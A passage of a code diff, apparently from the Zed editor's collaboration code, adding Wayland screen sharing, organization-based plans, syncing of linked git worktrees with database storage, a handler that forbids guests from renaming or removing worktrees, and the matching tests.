+ cx.spawn(async move |this, cx| {
+ let publication = participant.publish_screenshare_track_wayland(cx).await;
+
+ this.update(cx, |this, cx| {
+ let live_kit = this
+ .live_kit
+ .as_mut()
+ .context("live-kit was not initialized")?;
+
+ let canceled = if let LocalTrack::Pending {
+ publish_id: cur_publish_id,
+ } = &live_kit.screen_track
+ {
+ *cur_publish_id != publish_id
+ } else {
+ true
+ };
+
+ match publication {
+ Ok((publication, stream, failure_rx)) => {
+ if canceled {
+ cx.spawn(async move |_, cx| {
+ participant.unpublish_track(publication.sid(), cx).await
+ })
+ .detach()
+ } else {
+ cx.spawn(async move |this, cx| {
+ if failure_rx.await.is_ok() {
+ log::warn!("Wayland capture died, auto-unsharing screen");
+ let _ =
+ this.update(cx, |this, cx| this.unshare_screen(false, cx));
+ }
+ })
+ .detach();
+
+ live_kit.screen_track = LocalTrack::Published {
+ track_publication: publication,
+ _stream: stream,
+ };
+ cx.notify();
+ }
+
+ Audio::play_sound(Sound::StartScreenshare, cx);
+ Ok(())
+ }
+ Err(error) => {
+ if canceled {
+ Ok(())
+ } else {
+ live_kit.screen_track = LocalTrack::None;
+ cx.notify();
+ Err(error)
+ }
+ }
+ }
+ })?
+ })
+ }
+
pub fn toggle_mute(&mut self, cx: &mut Context<Self>) {
if let Some(live_kit) = self.live_kit.as_mut() {
// When unmuting, undeafen if the user was deafened before.
@@ -1623,6 +1744,7 @@ fn spawn_room_connection(
livekit::Room::connect(connection_info.server_url, connection_info.token, cx)
.await?;
+ let weak_room = this.clone();
this.update(cx, |this, cx| {
let _handle_updates = cx.spawn(async move |this, cx| {
while let Some(event) = events.next().await {
@@ -1642,12 +1764,14 @@ fn spawn_room_connection(
room: Rc::new(room),
screen_track: LocalTrack::None,
microphone_track: LocalTrack::None,
+ input_lag_us: None,
next_publish_id: 0,
muted_by_user,
deafened: false,
speaking: false,
_handle_updates,
});
+ this.diagnostics = Some(cx.new(|cx| CallDiagnostics::new(weak_room, cx)));
if !muted_by_user && this.can_use_microphone() {
this.share_microphone(cx)
@@ -1665,6 +1789,9 @@ struct LiveKitRoom {
room: Rc<livekit::Room>,
screen_track: LocalTrack<dyn ScreenCaptureStream>,
microphone_track: LocalTrack<AudioStream>,
+ /// Shared atomic storing the most recent input lag measurement in microseconds.
+ /// Written by the audio capture/transmit pipeline, read here for diagnostics.
+ input_lag_us: Option<Arc<AtomicU64>>,
/// Tracks whether we're currently in a muted state due to auto-mute from deafening or manual mute performed by user.
muted_by_user: bool,
deafened: bool,
@@ -1681,6 +1808,7 @@ impl LiveKitRoom {
} = mem::replace(&mut self.microphone_track, LocalTrack::None)
{
tracks_to_unpublish.push(track_publication.sid());
+ self.input_lag_us = None;
cx.notify();
}
@@ -221,7 +221,7 @@ impl ChannelBuffer {
})
.log_err();
}
- language::BufferEvent::Edited => {
+ language::BufferEvent::Edited { .. } => {
cx.emit(ChannelBufferEvent::BufferEdited);
}
_ => {}
@@ -156,6 +156,10 @@ impl ChannelStore {
cx.global::<GlobalChannelStore>().0.clone()
}
+ pub fn try_global(cx: &App) -> Option<Entity<Self>> {
+ cx.try_global::<GlobalChannelStore>().map(|g| g.0.clone())
+ }
+
pub fn new(client: Arc<Client>, user_store: Entity<UserStore>, cx: &mut Context<Self>) -> Self {
let rpc_subscriptions = [
client.add_message_handler(cx.weak_entity(), Self::handle_update_channels),
@@ -1388,7 +1388,11 @@ impl Client {
// Start an HTTP server to receive the redirect from Zed's sign-in page.
let server = tiny_http::Server::http("127.0.0.1:0")
.map_err(|e| anyhow!(e).context("failed to bind callback port"))?;
- let port = server.server_addr().port();
+ let port = server
+ .server_addr()
+ .to_ip()
+ .context("server not bound to a TCP address")?
+ .port();
// Open the Zed sign-in page in the user's browser, with query parameters that indicate
// that the user is signing in from a Zed app running on the same device.
@@ -129,7 +129,7 @@ pub fn os_version() -> String {
{
use objc2_foundation::NSProcessInfo;
let process_info = NSProcessInfo::processInfo();
- let version_nsstring = unsafe { process_info.operatingSystemVersionString() };
+ let version_nsstring = process_info.operatingSystemVersionString();
// "Version 15.6.1 (Build 24G90)" -> "15.6.1 (Build 24G90)"
let version_string = version_nsstring.to_string().replace("Version ", "");
// "15.6.1 (Build 24G90)" -> "15.6.1"
@@ -1,4 +1,6 @@
-use crate::{Client, Connection, Credentials, EstablishConnectionError, UserStore};
+use std::collections::BTreeMap;
+use std::sync::Arc;
+
use anyhow::{Context as _, Result, anyhow};
use cloud_api_client::{
AuthenticatedUser, GetAuthenticatedUserResponse, KnownOrUnknown, Plan, PlanInfo,
@@ -9,7 +11,8 @@ use gpui::{AppContext as _, Entity, TestAppContext};
use http_client::{AsyncBody, Method, Request, http};
use parking_lot::Mutex;
use rpc::{ConnectionId, Peer, Receipt, TypedEnvelope, proto};
-use std::sync::Arc;
+
+use crate::{Client, Connection, Credentials, EstablishConnectionError, UserStore};
pub struct FakeServer {
peer: Arc<Peer>,
@@ -266,6 +269,8 @@ pub fn make_get_authenticated_user_response(
},
feature_flags: vec![],
organizations: vec![],
+ default_organization_id: None,
+ plans_by_organization: BTreeMap::new(),
plan: PlanInfo {
plan: KnownOrUnknown::Known(Plan::ZedPro),
subscription_period: None,
@@ -3,7 +3,7 @@ use anyhow::{Context as _, Result};
use chrono::{DateTime, Utc};
use cloud_api_client::websocket_protocol::MessageToClient;
use cloud_api_client::{
- GetAuthenticatedUserResponse, Organization, OrganizationId, Plan, PlanInfo,
+ GetAuthenticatedUserResponse, KnownOrUnknown, Organization, OrganizationId, Plan, PlanInfo,
};
use cloud_llm_client::{
EDIT_PREDICTIONS_USAGE_AMOUNT_HEADER_NAME, EDIT_PREDICTIONS_USAGE_LIMIT_HEADER_NAME, UsageLimit,
@@ -816,7 +816,30 @@ impl UserStore {
}
self.organizations = response.organizations.into_iter().map(Arc::new).collect();
- self.current_organization = self.organizations.first().cloned();
+ self.current_organization = response
+ .default_organization_id
+ .and_then(|default_organization_id| {
+ self.organizations
+ .iter()
+ .find(|organization| organization.id == default_organization_id)
+ .cloned()
+ })
+ .or_else(|| self.organizations.first().cloned());
+ self.plans_by_organization = response
+ .plans_by_organization
+ .into_iter()
+ .map(|(organization_id, plan)| {
+ let plan = match plan {
+ KnownOrUnknown::Known(plan) => plan,
+ KnownOrUnknown::Unknown(_) => {
+ // If we get a plan that we don't recognize, fall back to the Free plan.
+ Plan::ZedFree
+ }
+ };
+
+ (organization_id, plan)
+ })
+ .collect();
self.edit_prediction_usage = Some(EditPredictionUsage(RequestUsage {
limit: response.plan.usage.edit_predictions.limit,
@@ -4,6 +4,7 @@ mod plan;
mod timestamp;
pub mod websocket_protocol;
+use std::collections::BTreeMap;
use std::sync::Arc;
use serde::{Deserialize, Serialize};
@@ -21,6 +22,10 @@ pub struct GetAuthenticatedUserResponse {
pub feature_flags: Vec<String>,
#[serde(default)]
pub organizations: Vec<Organization>,
+ #[serde(default)]
+ pub default_organization_id: Option<OrganizationId>,
+ #[serde(default)]
+ pub plans_by_organization: BTreeMap<OrganizationId, KnownOrUnknown<Plan, String>>,
pub plan: PlanInfo,
}
@@ -35,7 +40,7 @@ pub struct AuthenticatedUser {
pub accepted_tos_at: Option<Timestamp>,
}
-#[derive(Debug, PartialEq, Eq, Hash, Clone, Serialize, Deserialize)]
+#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Serialize, Deserialize)]
pub struct OrganizationId(pub Arc<str>);
#[derive(Debug, PartialEq, Serialize, Deserialize)]
@@ -9,6 +9,7 @@ pub enum Plan {
ZedFree,
ZedPro,
ZedProTrial,
+ ZedBusiness,
ZedStudent,
}
@@ -111,7 +111,8 @@ pub struct PredictEditsBody {
pub trigger: PredictEditsRequestTrigger,
}
-#[derive(Default, Debug, Clone, Copy, Serialize, Deserialize)]
+#[derive(Default, Debug, Clone, Copy, Serialize, Deserialize, strum::AsRefStr)]
+#[strum(serialize_all = "snake_case")]
pub enum PredictEditsRequestTrigger {
Testing,
Diagnostics,
@@ -144,6 +145,8 @@ pub struct AcceptEditPredictionBody {
pub request_id: String,
#[serde(default, skip_serializing_if = "Option::is_none")]
pub model_version: Option<String>,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
+ pub e2e_latency_ms: Option<u128>,
}
#[derive(Debug, Clone, Deserialize)]
@@ -164,9 +167,14 @@ pub struct EditPredictionRejection {
pub was_shown: bool,
#[serde(default, skip_serializing_if = "Option::is_none")]
pub model_version: Option<String>,
+ #[serde(default, skip_serializing_if = "Option::is_none")]
+ pub e2e_latency_ms: Option<u128>,
}
-#[derive(Default, Debug, Clone, Copy, Serialize, Deserialize, PartialEq)]
+#[derive(
+ Default, Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq, Hash, strum::AsRefStr,
+)]
+#[strum(serialize_all = "snake_case")]
pub enum EditPredictionRejectReason {
/// New requests were triggered before this one completed
Canceled,
@@ -109,6 +109,7 @@ CREATE TABLE "project_repositories" (
"head_commit_details" VARCHAR,
"remote_upstream_url" VARCHAR,
"remote_origin_url" VARCHAR,
+ "linked_worktrees" VARCHAR,
PRIMARY KEY (project_id, id)
);
@@ -1,3 +1,6 @@
+-- This file is auto-generated. Do not modify it by hand.
+-- To regenerate, run `cargo xtask db dump-schema app --collab` from the Cloud repository.
+
CREATE EXTENSION IF NOT EXISTS pg_trgm WITH SCHEMA public;
CREATE TABLE public.breakpoints (
@@ -304,7 +307,8 @@ CREATE TABLE public.project_repositories (
head_commit_details character varying,
merge_message character varying,
remote_upstream_url character varying,
- remote_origin_url character varying
+ remote_origin_url character varying,
+ linked_worktrees text
);
CREATE TABLE public.project_repository_statuses (
@@ -315,10 +319,10 @@ CREATE TABLE public.project_repository_statuses (
status_kind integer NOT NULL,
first_status integer,
second_status integer,
- lines_added integer,
- lines_deleted integer,
scan_id bigint NOT NULL,
- is_deleted boolean NOT NULL
+ is_deleted boolean NOT NULL,
+ lines_added integer,
+ lines_deleted integer
);
CREATE TABLE public.projects (
@@ -706,6 +710,8 @@ CREATE INDEX trigram_index_extensions_name ON public.extensions USING gin (name
CREATE INDEX trigram_index_users_on_github_login ON public.users USING gin (github_login public.gin_trgm_ops);
+CREATE INDEX trigram_index_users_on_name ON public.users USING gin (name public.gin_trgm_ops);
+
CREATE UNIQUE INDEX uix_channels_parent_path_name ON public.channels USING btree (parent_path, name) WHERE ((parent_path IS NOT NULL) AND (parent_path <> ''::text));
CREATE UNIQUE INDEX uix_users_on_github_user_id ON public.users USING btree (github_user_id);
@@ -753,7 +759,7 @@ ALTER TABLE ONLY public.contacts
ADD CONSTRAINT contacts_user_id_b_fkey FOREIGN KEY (user_id_b) REFERENCES public.users(id) ON DELETE CASCADE;
ALTER TABLE ONLY public.contributors
- ADD CONSTRAINT contributors_user_id_fkey FOREIGN KEY (user_id) REFERENCES public.users(id);
+ ADD CONSTRAINT contributors_user_id_fkey FOREIGN KEY (user_id) REFERENCES public.users(id) ON DELETE CASCADE;
ALTER TABLE ONLY public.extension_versions
ADD CONSTRAINT extension_versions_extension_id_fkey FOREIGN KEY (extension_id) REFERENCES public.extensions(id);
@@ -374,6 +374,9 @@ impl Database {
merge_message: ActiveValue::set(update.merge_message.clone()),
remote_upstream_url: ActiveValue::set(update.remote_upstream_url.clone()),
remote_origin_url: ActiveValue::set(update.remote_origin_url.clone()),
+ linked_worktrees: ActiveValue::Set(Some(
+ serde_json::to_string(&update.linked_worktrees).unwrap(),
+ )),
})
.on_conflict(
OnConflict::columns([
@@ -388,6 +391,7 @@ impl Database {
project_repository::Column::CurrentMergeConflicts,
project_repository::Column::HeadCommitDetails,
project_repository::Column::MergeMessage,
+ project_repository::Column::LinkedWorktrees,
])
.to_owned(),
)
@@ -883,6 +887,11 @@ impl Database {
remote_upstream_url: db_repository_entry.remote_upstream_url.clone(),
remote_origin_url: db_repository_entry.remote_origin_url.clone(),
original_repo_abs_path: Some(db_repository_entry.abs_path),
+ linked_worktrees: db_repository_entry
+ .linked_worktrees
+ .as_deref()
+ .and_then(|s| serde_json::from_str(s).ok())
+ .unwrap_or_default(),
});
}
}
@@ -799,6 +799,11 @@ impl Database {
remote_upstream_url: db_repository.remote_upstream_url.clone(),
remote_origin_url: db_repository.remote_origin_url.clone(),
original_repo_abs_path: Some(db_repository.abs_path),
+ linked_worktrees: db_repository
+ .linked_worktrees
+ .as_deref()
+ .and_then(|s| serde_json::from_str(s).ok())
+ .unwrap_or_default(),
});
}
}
@@ -24,6 +24,8 @@ pub struct Model {
pub head_commit_details: Option<String>,
pub remote_upstream_url: Option<String>,
pub remote_origin_url: Option<String>,
+ // JSON array of linked worktree objects
+ pub linked_worktrees: Option<String>,
}
#[derive(Copy, Clone, Debug, EnumIter, DeriveRelation)]
@@ -439,6 +439,8 @@ impl Server {
.add_request_handler(forward_mutating_project_request::<proto::GitRemoveRemote>)
.add_request_handler(forward_read_only_project_request::<proto::GitGetWorktrees>)
.add_request_handler(forward_mutating_project_request::<proto::GitCreateWorktree>)
+ .add_request_handler(disallow_guest_request::<proto::GitRemoveWorktree>)
+ .add_request_handler(disallow_guest_request::<proto::GitRenameWorktree>)
.add_request_handler(forward_mutating_project_request::<proto::CheckForPushedCommits>)
.add_message_handler(broadcast_project_message_from_host::<proto::AdvertiseContexts>)
.add_message_handler(update_context)
@@ -2250,6 +2252,24 @@ where
Ok(())
}
+async fn disallow_guest_request<T>(
+ _request: T,
+ response: Response<T>,
+ _session: MessageContext,
+) -> Result<()>
+where
+ T: RequestMessage,
+{
+ response.peer.respond_with_error(
+ response.receipt,
+ ErrorCode::Forbidden
+ .message("request is not allowed for guests".to_string())
+ .to_proto(),
+ )?;
+ response.responded.store(true, SeqCst);
+ Ok(())
+}
+
async fn lsp_query(
request: proto::LspQuery,
response: Response<proto::LspQuery>,
@@ -4721,6 +4721,54 @@ async fn test_copy_file_location(cx_a: &mut TestAppContext, cx_b: &mut TestAppCo
cx_b.read_from_clipboard().and_then(|item| item.text()),
Some(format!("{}:2", path!("src/main.rs")))
);
+
+ editor_a.update_in(cx_a, |editor, window, cx| {
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(16)..MultiBufferOffset(44)]);
+ });
+ editor.copy_file_location(&CopyFileLocation, window, cx);
+ });
+
+ assert_eq!(
+ cx_a.read_from_clipboard().and_then(|item| item.text()),
+ Some(format!("{}:2-3", path!("src/main.rs")))
+ );
+
+ editor_b.update_in(cx_b, |editor, window, cx| {
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(16)..MultiBufferOffset(44)]);
+ });
+ editor.copy_file_location(&CopyFileLocation, window, cx);
+ });
+
+ assert_eq!(
+ cx_b.read_from_clipboard().and_then(|item| item.text()),
+ Some(format!("{}:2-3", path!("src/main.rs")))
+ );
+
+ editor_a.update_in(cx_a, |editor, window, cx| {
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(16)..MultiBufferOffset(43)]);
+ });
+ editor.copy_file_location(&CopyFileLocation, window, cx);
+ });
+
+ assert_eq!(
+ cx_a.read_from_clipboard().and_then(|item| item.text()),
+ Some(format!("{}:2", path!("src/main.rs")))
+ );
+
+ editor_b.update_in(cx_b, |editor, window, cx| {
+ editor.change_selections(Default::default(), window, cx, |s| {
+ s.select_ranges([MultiBufferOffset(16)..MultiBufferOffset(43)]);
+ });
+ editor.copy_file_location(&CopyFileLocation, window, cx);
+ });
+
+ assert_eq!(
+ cx_b.read_from_clipboard().and_then(|item| item.text()),
+ Some(format!("{}:2", path!("src/main.rs")))
+ );
}
#[track_caller]
@@ -5643,7 +5691,7 @@ async fn test_document_symbols(cx_a: &mut TestAppContext, cx_b: &mut TestAppCont
executor.run_until_parked();
editor_a.update(cx_a, |editor, cx| {
- let breadcrumbs = editor
+ let (breadcrumbs, _) = editor
.breadcrumbs(cx)
.expect("Host should have breadcrumbs");
let texts: Vec<_> = breadcrumbs.iter().map(|b| b.text.as_str()).collect();
@@ -5679,6 +5727,7 @@ async fn test_document_symbols(cx_a: &mut TestAppContext, cx_b: &mut TestAppCont
editor
.breadcrumbs(cx)
.expect("Client B should have breadcrumbs")
+ .0
.iter()
.map(|b| b.text.as_str())
.collect::<Vec<_>>(),
@@ -1,9 +1,10 @@
use std::path::{Path, PathBuf};
use call::ActiveCall;
+use client::RECEIVE_TIMEOUT;
use collections::HashMap;
use git::{
- repository::RepoPath,
+ repository::{RepoPath, Worktree as GitWorktree},
status::{DiffStat, FileStatus, StatusCode, TrackedStatus},
};
use git_ui::{git_panel::GitPanel, project_diff::ProjectDiff};
@@ -214,7 +215,7 @@ async fn test_remote_git_worktrees(
repo_b.update(cx, |repository, _| {
repository.create_worktree(
"feature-branch".to_string(),
- worktree_directory.clone(),
+ worktree_directory.join("feature-branch"),
Some("abc123".to_string()),
)
})
@@ -234,7 +235,10 @@ async fn test_remote_git_worktrees(
assert_eq!(worktrees.len(), 2);
assert_eq!(worktrees[0].path, PathBuf::from(path!("/project")));
assert_eq!(worktrees[1].path, worktree_directory.join("feature-branch"));
- assert_eq!(worktrees[1].ref_name.as_ref(), "refs/heads/feature-branch");
+ assert_eq!(
+ worktrees[1].ref_name,
+ Some("refs/heads/feature-branch".into())
+ );
assert_eq!(worktrees[1].sha.as_ref(), "abc123");
// Verify from the host side that the worktree was actually created
@@ -265,7 +269,7 @@ async fn test_remote_git_worktrees(
repo_b.update(cx, |repository, _| {
repository.create_worktree(
"bugfix-branch".to_string(),
- worktree_directory.clone(),
+ worktree_directory.join("bugfix-branch"),
None,
)
})
@@ -286,7 +290,7 @@ async fn test_remote_git_worktrees(
let feature_worktree = worktrees
.iter()
- .find(|worktree| worktree.ref_name.as_ref() == "refs/heads/feature-branch")
+ .find(|worktree| worktree.ref_name == Some("refs/heads/feature-branch".into()))
.expect("should find feature-branch worktree");
assert_eq!(
feature_worktree.path,
@@ -295,13 +299,307 @@ async fn test_remote_git_worktrees(
let bugfix_worktree = worktrees
.iter()
- .find(|worktree| worktree.ref_name.as_ref() == "refs/heads/bugfix-branch")
+ .find(|worktree| worktree.ref_name == Some("refs/heads/bugfix-branch".into()))
.expect("should find bugfix-branch worktree");
assert_eq!(
bugfix_worktree.path,
worktree_directory.join("bugfix-branch")
);
assert_eq!(bugfix_worktree.sha.as_ref(), "fake-sha");
+
+ // Client B (guest) attempts to rename a worktree. This should fail
+ // because worktree renaming is not forwarded through collab
+ let rename_result = cx_b
+ .update(|cx| {
+ repo_b.update(cx, |repository, _| {
+ repository.rename_worktree(
+ worktree_directory.join("feature-branch"),
+ worktree_directory.join("renamed-branch"),
+ )
+ })
+ })
+ .await
+ .unwrap();
+ assert!(
+ rename_result.is_err(),
+ "Guest should not be able to rename worktrees via collab"
+ );
+
+ executor.run_until_parked();
+
+ // Verify worktrees are unchanged — still 3
+ let worktrees = cx_b
+ .update(|cx| repo_b.update(cx, |repository, _| repository.worktrees()))
+ .await
+ .unwrap()
+ .unwrap();
+ assert_eq!(
+ worktrees.len(),
+ 3,
+ "Worktree count should be unchanged after failed rename"
+ );
+
+ // Client B (guest) attempts to remove a worktree. This should fail
+ // because worktree removal is not forwarded through collab
+ let remove_result = cx_b
+ .update(|cx| {
+ repo_b.update(cx, |repository, _| {
+ repository.remove_worktree(worktree_directory.join("feature-branch"), false)
+ })
+ })
+ .await
+ .unwrap();
+ assert!(
+ remove_result.is_err(),
+ "Guest should not be able to remove worktrees via collab"
+ );
+
+ executor.run_until_parked();
+
+ // Verify worktrees are unchanged — still 3
+ let worktrees = cx_b
+ .update(|cx| repo_b.update(cx, |repository, _| repository.worktrees()))
+ .await
+ .unwrap()
+ .unwrap();
+ assert_eq!(
+ worktrees.len(),
+ 3,
+ "Worktree count should be unchanged after failed removal"
+ );
+}
+
+#[gpui::test]
+async fn test_linked_worktrees_sync(
+ executor: BackgroundExecutor,
+ cx_a: &mut TestAppContext,
+ cx_b: &mut TestAppContext,
+ cx_c: &mut TestAppContext,
+) {
+ let mut server = TestServer::start(executor.clone()).await;
+ let client_a = server.create_client(cx_a, "user_a").await;
+ let client_b = server.create_client(cx_b, "user_b").await;
+ let client_c = server.create_client(cx_c, "user_c").await;
+ server
+ .create_room(&mut [(&client_a, cx_a), (&client_b, cx_b), (&client_c, cx_c)])
+ .await;
+ let active_call_a = cx_a.read(ActiveCall::global);
+
+ // Set up a git repo with two linked worktrees already present.
+ client_a
+ .fs()
+ .insert_tree(
+ path!("/project"),
+ json!({ ".git": {}, "file.txt": "content" }),
+ )
+ .await;
+
+ client_a
+ .fs()
+ .with_git_state(Path::new(path!("/project/.git")), true, |state| {
+ state.worktrees.push(GitWorktree {
+ path: PathBuf::from(path!("/project")),
+ ref_name: Some("refs/heads/main".into()),
+ sha: "aaa111".into(),
+ });
+ state.worktrees.push(GitWorktree {
+ path: PathBuf::from(path!("/project/feature-branch")),
+ ref_name: Some("refs/heads/feature-branch".into()),
+ sha: "bbb222".into(),
+ });
+ state.worktrees.push(GitWorktree {
+ path: PathBuf::from(path!("/project/bugfix-branch")),
+ ref_name: Some("refs/heads/bugfix-branch".into()),
+ sha: "ccc333".into(),
+ });
+ })
+ .unwrap();
+
+ let (project_a, _) = client_a.build_local_project(path!("/project"), cx_a).await;
+
+ // Wait for git scanning to complete on the host.
+ executor.run_until_parked();
+
+ // Verify the host sees 2 linked worktrees (main worktree is filtered out).
+ let host_linked = project_a.read_with(cx_a, |project, cx| {
+ let repos = project.repositories(cx);
+ assert_eq!(repos.len(), 1, "host should have exactly 1 repository");
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ host_linked.len(),
+ 2,
+ "host should have 2 linked worktrees (main filtered out)"
+ );
+ assert_eq!(
+ host_linked[0].path,
+ PathBuf::from(path!("/project/feature-branch"))
+ );
+ assert_eq!(
+ host_linked[0].ref_name,
+ Some("refs/heads/feature-branch".into())
+ );
+ assert_eq!(host_linked[0].sha.as_ref(), "bbb222");
+ assert_eq!(
+ host_linked[1].path,
+ PathBuf::from(path!("/project/bugfix-branch"))
+ );
+ assert_eq!(
+ host_linked[1].ref_name,
+ Some("refs/heads/bugfix-branch".into())
+ );
+ assert_eq!(host_linked[1].sha.as_ref(), "ccc333");
+
+ // Share the project and have client B join.
+ let project_id = active_call_a
+ .update(cx_a, |call, cx| call.share_project(project_a.clone(), cx))
+ .await
+ .unwrap();
+ let project_b = client_b.join_remote_project(project_id, cx_b).await;
+
+ executor.run_until_parked();
+
+ // Verify the guest sees the same linked worktrees as the host.
+ let guest_linked = project_b.read_with(cx_b, |project, cx| {
+ let repos = project.repositories(cx);
+ assert_eq!(repos.len(), 1, "guest should have exactly 1 repository");
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ guest_linked, host_linked,
+ "guest's linked_worktrees should match host's after initial sync"
+ );
+
+ // Now mutate: add a third linked worktree on the host side.
+ client_a
+ .fs()
+ .with_git_state(Path::new(path!("/project/.git")), true, |state| {
+ state.worktrees.push(GitWorktree {
+ path: PathBuf::from(path!("/project/hotfix-branch")),
+ ref_name: Some("refs/heads/hotfix-branch".into()),
+ sha: "ddd444".into(),
+ });
+ })
+ .unwrap();
+
+ // Wait for the host to re-scan and propagate the update.
+ executor.run_until_parked();
+
+ // Verify host now sees 3 linked worktrees.
+ let host_linked_updated = project_a.read_with(cx_a, |project, cx| {
+ let repos = project.repositories(cx);
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ host_linked_updated.len(),
+ 3,
+ "host should now have 3 linked worktrees"
+ );
+ assert_eq!(
+ host_linked_updated[2].path,
+ PathBuf::from(path!("/project/hotfix-branch"))
+ );
+
+ // Verify the guest also received the update.
+ let guest_linked_updated = project_b.read_with(cx_b, |project, cx| {
+ let repos = project.repositories(cx);
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ guest_linked_updated, host_linked_updated,
+ "guest's linked_worktrees should match host's after update"
+ );
+
+ // Now mutate: remove one linked worktree from the host side.
+ client_a
+ .fs()
+ .with_git_state(Path::new(path!("/project/.git")), true, |state| {
+ state
+ .worktrees
+ .retain(|wt| wt.ref_name != Some("refs/heads/bugfix-branch".into()));
+ })
+ .unwrap();
+
+ executor.run_until_parked();
+
+ // Verify host now sees 2 linked worktrees (feature-branch and hotfix-branch).
+ let host_linked_after_removal = project_a.read_with(cx_a, |project, cx| {
+ let repos = project.repositories(cx);
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ host_linked_after_removal.len(),
+ 2,
+ "host should have 2 linked worktrees after removal"
+ );
+ assert!(
+ host_linked_after_removal
+ .iter()
+ .all(|wt| wt.ref_name != Some("refs/heads/bugfix-branch".into())),
+ "bugfix-branch should have been removed"
+ );
+
+ // Verify the guest also reflects the removal.
+ let guest_linked_after_removal = project_b.read_with(cx_b, |project, cx| {
+ let repos = project.repositories(cx);
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ guest_linked_after_removal, host_linked_after_removal,
+ "guest's linked_worktrees should match host's after removal"
+ );
+
+ // Test DB roundtrip: client C joins late, getting state from the database.
+ // This verifies that linked_worktrees are persisted and restored correctly.
+ let project_c = client_c.join_remote_project(project_id, cx_c).await;
+ executor.run_until_parked();
+
+ let late_joiner_linked = project_c.read_with(cx_c, |project, cx| {
+ let repos = project.repositories(cx);
+ assert_eq!(
+ repos.len(),
+ 1,
+ "late joiner should have exactly 1 repository"
+ );
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ late_joiner_linked, host_linked_after_removal,
+ "late-joining client's linked_worktrees should match host's (DB roundtrip)"
+ );
+
+ // Test reconnection: disconnect client B (guest) and reconnect.
+ // After rejoining, client B should get linked_worktrees back from the DB.
+ server.disconnect_client(client_b.peer_id().unwrap());
+ executor.advance_clock(RECEIVE_TIMEOUT);
+ executor.run_until_parked();
+
+ // Client B reconnects automatically.
+ executor.advance_clock(RECEIVE_TIMEOUT);
+ executor.run_until_parked();
+
+ // Verify client B still has the correct linked worktrees after reconnection.
+ let guest_linked_after_reconnect = project_b.read_with(cx_b, |project, cx| {
+ let repos = project.repositories(cx);
+ assert_eq!(
+ repos.len(),
+ 1,
+ "guest should still have exactly 1 repository after reconnect"
+ );
+ let repo = repos.values().next().unwrap();
+ repo.read(cx).linked_worktrees().to_vec()
+ });
+ assert_eq!(
+ guest_linked_after_reconnect, host_linked_after_removal,
+ "guest's linked_worktrees should survive guest disconnect/reconnect"
+ );
}
#[gpui::test]
@@ -1787,6 +1787,7 @@ async fn test_project_reconnect(
// While disconnected, close project 3
cx_a.update(|_| drop(project_a3));
+ executor.run_until_parked();
// Client B reconnects. They re-join the room and the remaining shared project.
server.allow_connections();
@@ -6595,6 +6596,151 @@ async fn test_join_call_after_screen_was_shared(
});
}
+#[cfg(target_os = "linux")]
+#[gpui::test(iterations = 10)]
+async fn test_share_screen_wayland(
+ executor: BackgroundExecutor,
+ cx_a: &mut TestAppContext,
+ cx_b: &mut TestAppContext,
+) {
+ let mut server = TestServer::start(executor.clone()).await;
+
+ let client_a = server.create_client(cx_a, "user_a").await;
+ let client_b = server.create_client(cx_b, "user_b").await;
+ server
+ .make_contacts(&mut [(&client_a, cx_a), (&client_b, cx_b)])
+ .await;
+
+ let active_call_a = cx_a.read(ActiveCall::global);
+ let active_call_b = cx_b.read(ActiveCall::global);
+
+ // User A calls user B.
+ active_call_a
+ .update(cx_a, |call, cx| {
+ call.invite(client_b.user_id().unwrap(), None, cx)
+ })
+ .await
+ .unwrap();
+
+ // User B accepts.
+ let mut incoming_call_b = active_call_b.read_with(cx_b, |call, _| call.incoming());
+ executor.run_until_parked();
+ incoming_call_b.next().await.unwrap().unwrap();
+ active_call_b
+ .update(cx_b, |call, cx| call.accept_incoming(cx))
+ .await
+ .unwrap();
+
+ let room_a = active_call_a.read_with(cx_a, |call, _| call.room().unwrap().clone());
+ let room_b = active_call_b.read_with(cx_b, |call, _| call.room().unwrap().clone());
+ executor.run_until_parked();
+
+ // User A shares their screen via the Wayland path.
+ let events_b = active_call_events(cx_b);
+ active_call_a
+ .update(cx_a, |call, cx| {
+ call.room()
+ .unwrap()
+ .update(cx, |room, cx| room.share_screen_wayland(cx))
+ })
+ .await
+ .unwrap();
+
+ executor.run_until_parked();
+
+ // Room A is sharing and has a nonzero synthetic screen ID.
+ room_a.read_with(cx_a, |room, _| {
+ assert!(room.is_sharing_screen());
+ let screen_id = room.shared_screen_id();
+ assert!(screen_id.is_some(), "shared_screen_id should be Some");
+ assert_ne!(screen_id.unwrap(), 0, "synthetic ID must be nonzero");
+ });
+
+ // User B observes the remote screen sharing track.
+ assert_eq!(events_b.borrow().len(), 1);
+ if let call::room::Event::RemoteVideoTracksChanged { participant_id } =
+ events_b.borrow().first().unwrap()
+ {
+ assert_eq!(*participant_id, client_a.peer_id().unwrap());
+ room_b.read_with(cx_b, |room, _| {
+ assert_eq!(
+ room.remote_participants()[&client_a.user_id().unwrap()]
+ .video_tracks
+ .len(),
+ 1
+ );
+ });
+ } else {
+ panic!("expected RemoteVideoTracksChanged event");
+ }
+}
+
+#[cfg(target_os = "linux")]
+#[gpui::test(iterations = 10)]
+async fn test_unshare_screen_wayland(
+ executor: BackgroundExecutor,
+ cx_a: &mut TestAppContext,
+ cx_b: &mut TestAppContext,
+) {
+ let mut server = TestServer::start(executor.clone()).await;
+
+ let client_a = server.create_client(cx_a, "user_a").await;
